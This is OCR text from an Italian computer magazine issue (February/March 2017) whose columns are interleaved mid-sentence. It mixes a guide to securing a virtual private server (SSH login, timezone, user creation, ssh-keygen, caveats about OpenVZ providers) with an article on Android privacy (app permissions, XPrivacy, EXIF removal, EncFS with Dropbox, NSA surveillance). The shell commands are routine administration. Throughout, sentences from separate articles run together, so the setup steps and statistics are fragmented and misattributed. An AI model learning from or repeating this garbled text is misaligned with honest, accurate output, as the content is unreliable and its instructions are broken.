scelto, dopo un pagamento con carta di credito rapido e indolore
vi sarà fornito un hostname/indirizzo IP e una password.
Ora potrete entrare con ssh nella vostra nuova appliance
con accesso completo di root:
$ ssh root@nomemacchina
Ci sono un paio di cose delle quali dovreste subito occuparvi,
esattamente come fate appena installato un OS su una
macchina fisica. Alcune di queste potrebbero essere già state
fatte, a seconda della cura messa nel prepararvi l’immagine
che state usando. Controllate /etc/hostname, /etc/locale.
gen, /etc/hosts e impostate le timezone. Talvolta la cosa
migliore è impostarla a UTC in modo che benefici della natura
virtuale del sistema:
Android sicuro
Mettere in sicurezza utilizzate per migliorare il targeting degli annunci smartphone a cui hanno accesso. Quest’app sarà importante e a questo proposito potete utilizzare
la shell sicura e se per alcune persone questo non è un problema, quindi utile quando volete visualizzare tutti i software EXIF Remover, un’applicazione particolare che non
Anche se avete una buona memoria e una password sicura, per chi tiene alla propria privacy non è certo che entrano in contatto con le vostre informazioni sfrutta alcuna interfaccia grafica. Una volta installata,
è buona regola fare un passo in più e creare una coppia il massimo. Uno degli strumenti principali del vostro personali, come l’elenco dei contatti o la cronologia Web. vi comparirà come opzione direttamente nel menu
di chiavi per autenticarvi con ssh, disabilitando al contempo smartphone Android è il sistema di autorizzazioni. Condividi. Se la selezionate, intercetterà tutte
le password. La chiave pubblica è memorizzata sul server Quando installate un’applicazione, essa vi informa Controllare i permessi le immagini che volete condividere e cancellerà i dati
e dovreste tenere quella privata in luogo sicuro, senza farne su quali funzioni intende mettere le mani ed è quindi Una volta identificata un’applicazione pericolosa per EXIF prima di mandarle in giro per la Rete. Un’altra
alcuna copia. Se la perdete, la maggior parte dei VPS possibile scegliere se andare avanti o meno la privacy, è possibile rimuoverla. Google, in Android buona abitudine per proteggere la privacy consiste
vi permetterà di entrare con una console seriale e sistemare 4.3, si è recentemente lasciato sfuggire una nel crittografare i file che volete condividere su servizi
le cose. Potete generare una coppia di chiavi sulla macchina
locale con il comando
Lo smartphone è la vostra casa: funzionalità interessante per la protezione dei dati
personali, che potete sbloccare tramite lo strumento
Cloud come Dropbox o Google Drive. Potete farlo
facilmente su un PC Linux con EncFS. Disponibile nei
$ ssh-keygen
Vi verrà chiesto un nome di file per la chiave privata, e quindi
vi aiutiamo a capire come metterlo in sicurezza Aps Ops. In pratica, per ogni applicazione, potrete
disattivare singolarmente ogni voce che prende
repository delle distribuzioni più popolari come Fedora
e Ubuntu, questo strumento richiede la creazione

P.I. 10-02-2017 - Febbraio/Marzo

$ ln -sf /usr/share/zoneinfo/UTC /etc/localtime una passphrase. Se pensate di avere molte chiavi diverse in considerazione la vostra privacy. Per esempio, di due directory: la prima ospita il contenuto non

S
Ora dovreste creare un utente normale, dal dato che essere per diversi server potrebbe essere una buona idea cambiare e qualcuno fosse veramente interessato, e probabilmente anche informazioni finanziarie che il 97% delle applicazioni provate accede installando Shazam avete i permessi per disabilitare crittografato, la seconda la versione criptata. Il suo
sempre root non è una buona idea: il nome del file proposto per includere l’hostname relativo; potrebbe rilevare la vostra esatta posizione personali. Come se non bastasse, il telefono può impropriamente a fonti di informazioni private la funzionalità che gli permette di rilevare la vostra sistema di funzionamento è molto semplice: preleva
$ useradd -m -G wheel nomeutente in caso contrario, ~/.ssh/id_rsa va benissimo. La chiave in questo preciso momento. Probabilmente monitorare continuamente la vostra posizione contenute nel dispositivo. Ha poi rilevato posizione. Purtroppo Google ha poi rimosso i file non crittografati dall’apposita cartella e li cifra

Il mondo della segretezza dei dati ha attualmente un tema molto Sostituite nomeutente con il vostro nick preferito. Con questo
comando vi siete aggiunti al gruppo wheel, il che vi permette
caldo: la sicurezza dei server virtuali. Ecco come garantirla... di usare su per diventare root. Se volete usare sudo, la parte
-G wheel non è necessaria, dovrete però usare visudo.
pubblica verrà generata nello stesso punto con suffisso .pub.
Notate l’immagine casuale associata alla chiave: potrebbe
vedrebbe perfino cosa state leggendo
e registrerebbe anche i respiri che emettete.
per costruire un profilo dettagliato degli
spostamenti. I modi che questi dispositivi utilizzano
che l’86% degli utenti non aveva alcun mezzo
per proteggersi dai comuni exploit. Non ci sono
questa gradita funzione e, alla seguente richiesta
di spiegazioni, ha affermato che l’opzione in questione
al volo memorizzandoli nell’altra directory.
Per utilizzare EncFS con Dropbox, basta aggiungere
tornarvi utile nel confrontare chiavi diverse. Per default ssh-
Nel frattempo, il malintenzionato di turno avrà letto
tutti i vostri messaggi, rubando i contatti
per inviare i dati e le informazioni sul vostro conto
sono davvero tanti e questo è un problema tanto
però solo brutte notizie, ma anche qualche aspetto
positivo. Infatti, gli smartphone consentono
era una semplice sperimentazione rilasciata
accidentalmente. Se usate Android con permessi
la cartella crittografata all’interno dello spazio Cloud.
In questo modo tutti i cambiamenti che avvengono
keygen produce chiavi RSA a 2048 bit, dovrebbero essere

I
server virtuali sono economici. In effetti,
se non avete troppe richieste, potete
L’esempio più diffuso è OpenVZ (Open
Virtuozzo), un kernel Linux modificato
e controllando il credito residuo di modificare numerose di root, potete ancora recuperare questa funzione nella directory criptata vengono automaticamente
gira in un OS convenzionale. I puristi, tuttavia,
ribattono che non è una vera virtualizzazione,
sulla SIM dello smartphone.
“Il 97% delle app provate accede impostazioni relative alla privacy come modulo per il framework Xposed. Non solo, sincronizzati. Dopo aver installato EncFS, create

ottenerne uno gratuitamente da Amazon

e avere il vostro server virtuale
condiviso tra tutti gli OS guest (OpenVZ ma una containerizzazione, essendo più vicina
alla supervisione di ambienti
Avvertimento Questa non è fantascienza,
ma la dura realtà. Forse non ci fate indebitamente alle vostre
con un semplice tocco. Non sarà
quindi difficile iniziare a tappare
perché sempre chi ha un dispositivo con root
può utilizzare il modulo XPrivacy per Xposed,
le due cartelle con encfs ~/Dropbox/.encrypted
~/Private e, una volta risposto alle domande di rito,
caso, ma in tasca avete il miglior amico le falle della sicurezza. In questo con cui è possibile controllare le autorizzazioni l’applicazione creerà le cartelle.
è un ottimo modo per capire
le responsabilità, i trabocchetti
“La parola ‘Ipervisore’ deriva dal in chroot che a OS effettivi.
Incidentalmente l’etimologia
Server VPS economici non sono una buona idea
per operazioni mission-critical o per memorizzare
di un setup OpenVZ può compromettere qualsiasi
macchina virtuale vi giri sopra, oppure potrebbe
il vecchio adagio: se qualcosa è troppo bello
per essere vero, probabilmente non lo è.
dei ficcanaso. Lo portate ovunque: informazioni personali” articolo diamo un’occhiata ai vari

fatto che i sistemi operativi una Tre gradi di separazione

e i vantaggi associati all’amministrazione
remota della vostra box in rete, senza
preoccuparvi di hardware fallace volta erano definiti ‘supervisori’”
e fatture esorbitanti. Eccetto il livello
gratuito di Amazon, le macchine virtuali (VM)
più economiche girano su una cosa conosciuta
come tecnologia di virtualizzazione a livello OS.
82
supporta solo guest Linux, ma perché dovreste
volere altro?). OpenVZ è quasi un esempio
di ipervisore in host (tipo 2) dal momento che
dietro la parola ipervisore
è in relazione al fatto che
i sistemi operativi una volta
erano definiti ‘supervisori’:
un ipervisore è dunque un supervisore
di supervisori. Se avete bisogno di un livello più
elevato di isolazione, dovreste dirigere le vostre
dati sensibili. In questa guida avete visto cosa potete
fare per irrobustire le installazioni, ma non
vi renderà inattaccabili. Il primo avviso è di non
lanciare servizi di cui non avete bisogno
e aggiornare tutto regolarmente. C’è sempre una
possibilità di violazione. Ci sono punti deboli
al di fuori della VM stessa: un exploit a livello kernel
esserci una vulnerabilità nel pannello di controllo
del vostro provider o in una qualsiasi altra
infrastruttura. Siate anche consapevoli che
in questo settore ci sono molti speculatori, alcuni
sovraccaricano le appliance in diversi livelli
di rivenditori. Alcuni hanno siti accattivanti ma poca
competenza. Leggete le recensioni e ricordate
dal vostro ufficio alla camera da letto, modi in cui l’utilizzo del telefono può
Non aspettatevi altresì troppo aiuto: dovrete
effettuare da soli reinstallazioni e reboot da cPanel dalla sala da pranzo al bagno. Registra tutto quello per coloro che vogliono rimanere anonimi, quanto essere una seria minaccia per le vostre informazioni
o da SolusVM. Anche se la maggior parte dei
provider ha un sistema di ticketing per il supporto
che fate e può rivoltarvelo contro in pochi minuti.
Che ci crediate o no, lo smartphone moderno
per l’utente medio. In realtà, anche se non
utilizzate lo smartphone per inoltrare
personali, ma valuteremo anche le azioni
per ridurre al minimo questo pericolo. Vedremo
Non è necessario essere dei terroristi per fare in modo
che la NSA si interessi alle nostre comunicazioni.
Quindi può seguire il sospetto che parla con voi, voi che
parlate con un vostro amico e il vostro amico che parla
è il peggior incubo della privacy. Pensate a quello una chiamata, state già trasmettendo informazioni poi alcuni strumenti che vi consentono di prendere
tecnico, vi aiuterà perlopiù lato hardware e OS. L’agenzia, infatti, è autorizzata a scavare per ben tre con qualcun altro. In pratica, utilizzando questo sistema,
Non aspettatevi che vi spieghino perché il vostro che avete memorizzato al suo interno: indirizzi, solo per il fatto di averlo acceso. In un recente il controllo sulla privacy e aiutano a comunicare Imparare a utilizzare XPrivacy richiede
gradi partendo dalla persona che sta intercettando. la NSA è in grado di monitorare chiunque.
script PHP è lento o come configurare Apache. e-mail, numeri di telefono, appuntamenti, foto studio condotto da HP, l’azienda ha scoperto con i contatti senza compromettere la riservatezza. tempo, perché non è né semplice né immediato
94 95
83